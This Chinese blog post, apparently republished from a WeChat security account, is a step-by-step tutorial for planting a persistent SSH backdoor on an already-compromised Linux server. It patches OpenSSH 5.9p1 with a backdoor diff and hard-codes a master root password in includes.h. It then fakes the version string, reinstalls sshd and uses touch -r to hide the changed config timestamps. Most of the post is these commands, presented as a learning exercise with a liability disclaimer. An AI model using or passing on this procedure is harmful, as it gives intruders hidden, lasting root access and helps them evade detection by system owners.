权限维持之SSH后门安装

  • A+
所属分类:安全文章

0x00 前言

虽然可以ssh连进去,但是可否长期进行控制呢?这里就涉及到ssh后门的问题了,本次就是通过WinSCP与Linux服务器进行连接,然后配置安装SSH后门,这次实验主要目的通过实践学习熟悉Linux SSH后门的安装过程和步骤。

0x01 配置SSH后门

2.1:建立连接

利用winSCP工具(也可以选用其他工具)连接已知(即已经渗透成功的服务器)服务器,如图:

权限维持之SSH后门安装

连接成功后:权限维持之SSH后门安装

用SecureCRT连接成功后如图:权限维持之SSH后门安装

通过ssh -V查看当前SSH版本

上传带有后门的SSH安装包

上传工具(上面提到的WinSCP、SecureCRT、putty都可以,自行选择)权限维持之SSH后门安装

解压上传的安装包

tar zxf openssh-5.9p1.tar.gztar zxf 0x06-openssh-5.9p1.patch.tar.gz

权限维持之SSH后门安装

执行如下命令,移动原有配置文件

mv /etc/ssh/ssh_config /etc/ssh/ssh_config.oldmv /etc/ssh/sshd_config /etc/ssh/sshd_config.old

复制文件sshbd5.9p1.diff到openssh-5.9p1目录

cd openssh-5.9p1.patch/cp sshbd5.9p1.diff …/openssh-5.9p1cd …/openssh-5.9p1patch < sshbd5.9p1.diff

权限维持之SSH后门安装

编辑includes.h文件,设置自己的后门密码

vi includes.h

找到#define SECRETPW “apaajaboleh” // apaajaboleh为后门的密码 可修改成自己设定的密码,如图权限维持之SSH后门安装


修改当前系统的SSH版本

通过ssh -V查看当前SSH版本,记录下来

vi version.h 修改version.h文件的版本信息权限维持之SSH后门安装


0x02 安装SSH后门


执行./configure --prefix=/usr --sysconfdir=/etc/ssh指定配置选项

执行make && make install 编译安装

安转完成后如图:权限维持之SSH后门安装

touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_config //修改日期touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config //修改日期/etc/init.d/ssh restart //重启ssh服务

0x03 测试后门是否安装成功


用连接工具连接ssh,用户名为root,密码为前面设置的SSH后门的密码权限维持之SSH后门安装

最后

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。


无害实验室拥有对此文章的修改和解释权如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的


本文始发于微信公众号(无害实验室sec):权限维持之SSH后门安装

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: